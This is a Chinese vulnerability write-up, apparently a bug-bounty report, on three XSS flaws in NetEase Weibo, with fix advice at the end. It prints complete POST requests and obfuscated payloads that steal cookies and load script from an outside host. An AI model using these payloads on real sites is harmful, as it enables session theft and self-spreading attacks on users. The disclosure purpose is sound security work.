目前几个有微博的网站，都快转遍了，网易还没检测。今天晚上就跑来对网易微博做了一次检测。发现3处XSS。
 
1. 内容存储型XSS，危害不解释，看到微博即中招。通杀所有浏览器
2. 微博主页存储型XSS，IE 6,7，8+兼容模式 有效
3. 微博子页面XSS。
 
具体见详细说明。
 
BTW, 求礼物...求礼物....

这里顺便分享下检测方式。
 
从小漏洞到大漏洞依次说。
 
----------------------------------------------------------
 
1. 子页面XSS。
 
习惯性的看一下网页的源码。 发现以下这么一段。
 
<script type="text/javascript">
(function() {
   var url = location.toString();
   var index = url.indexOf('#!');
   if (index != -1) {
      location.replace(url.substr(index + 2).replace(/\:/g, ''));
   }
})();
</script>
 
 
那么我们可以构造一个URL来执行我们的命令。
 
http://t.163.com/tbox#!javascript:alert(document.cookie);
 
 
可是从代码里，我们可以看出，网易将 冒号:给过滤了
 
不过在IE下（测试时为win7+ IE9），我们可以通过以下方式绕过。
 
http://t.163.com/tbox#!javascript&#x3A;alert(document.cookie);
 
 
效果证明：
 
 
 
----------------------------------------------------------
 
2. 漏洞2，个人主页存储型XSS， 由于是在css里，用expression，对IE6，7及IE8以上兼容模式有效。
 
这个漏洞比较低级，我就不详细说了。
 
缺陷位置：微博换肤功能。
缺陷URL：http://t.163.com/user.do?action=updateUserConfig
缺陷参数：(4个)
profile_background_image_url
profile_background_pos
profile_background_fixed
profile_background_filled
缺陷原因：没有过滤(,),; ，导致可以对css进行闭合。
 
利用步骤：
 
POST http://t.163.com/user.do?action=updateUserConfig
POSTDATA
profile_background_image_url=);color:expression(if(!window.x){window.x=1;var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115);document.body.appendChild(s);});a:(
 
 
以上代码是调用外部JS了，这里我就不给截图证明了，安全人员肯定知道的。
 
 
----------------------------------------------------------
 
3. 微博内容存储型XSS，这个危害是显而易见的。
 
分享一下发现方法：
 
A. 首先，我个人比较喜欢测试多媒体功能，就试用了一下微博的音乐发送功能，发送的同时，也进行抓包。
 
可以看到抓包有2个请求。
 
请求一：将音乐地址生成短网址
 
POST http://t.163.com/music.do?action=toShortUrl
POSTDATA
 
url   http://www.xiami.com/song/1769227691
 
 
请求二：推送微博内容
 
POST http://t.163.com/tweet.do?action=addTweet
POSTDATA
 
content    Somewhere Only We Know—Keane http://163.fm/QJ5yOnj
isRetweet       0
replyOriginal   0
replyIt     0
flag  0
imageUrl
voteUrl
 
 
B. 按照我一贯的思维方式，F12 打开chrome 的调试工具，定位到刚发的那条微博上。
 
发现以下有趣的内容。
 
 
 
 
C. 可以看出那个地址就是播放的歌曲地址，也就是步骤A中，被转换为短网址的那个地址。
 
接着发挥俺的想象，推想一下。
 
如果微博的开发人员，是反向将短网址的内容，输出到这里，而且没有任何过滤的话，岂不是爽了？
 
如果真没过滤的话，我们可以构建以下代码进行XSS
 
songurl="http://www.xiami.com/song/1769227691"><img src=1 onload=alert(1) /><a
 
D. 带着这个想法，我们通过以下步骤来进行XSS。
 
E. 将含有恶意代码的网址转变为短网址
 
POST http://t.163.com/music.do?action=toShortUrl
POSTDATA
 
url=http://www.xiami.com/song/2068536?"'><img src=1 onerror='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115);document.body.appendChild(s);'><a
 
返回数据得到短网址  http://163.fm/QJ5yOnj
 
 
F. 将构建的短网址放入内容进行发送
 
POST http://t.163.com/tweet.do?action=addTweet
POSTDATA
 
content    Somewhere Only We Know—Keane http://163.fm/QJ5yOnj
isRetweet       0
replyOriginal   0
replyIt     0
flag  0
imageUrl
voteUrl
 
 
G. 刷新我们的微博，会发现多了一条微博，并且弹出了cookies。 这证明了我们的猜想是对的～～ 为了进一步确定，我们可以再打开Chrome调试工具，看看
 
 
 

效果证明：
 
chrome下自己查看微博的弹窗：
 
 
 
 
IE下，用另外一个号关注了上面这个号之后，在自己的主页被上面的号发送的微博弹窗。
 www.2cto.com
 



 
 
 
 
至于Firefox，我就不测试了，因为这段利用过程不存在浏览器兼容问题。
 


修复方案：

1. 对于子页面的那个XSS，除了过滤冒号之外，应该判断一下，#!以后的内容，加强判断。
 
2. 对于个人主页的XSS， 多个最起码的正则判断吧，比如profile_background_fixed 这个参数只有0和1，很好限制的。然后过滤 （）这种可能闭合css的字符。
 
3. 至于第3个XSS，在从短网址读取真实歌曲地址的时候，encodeURIComponent 编码一下所得到的真实地址，再输出即可！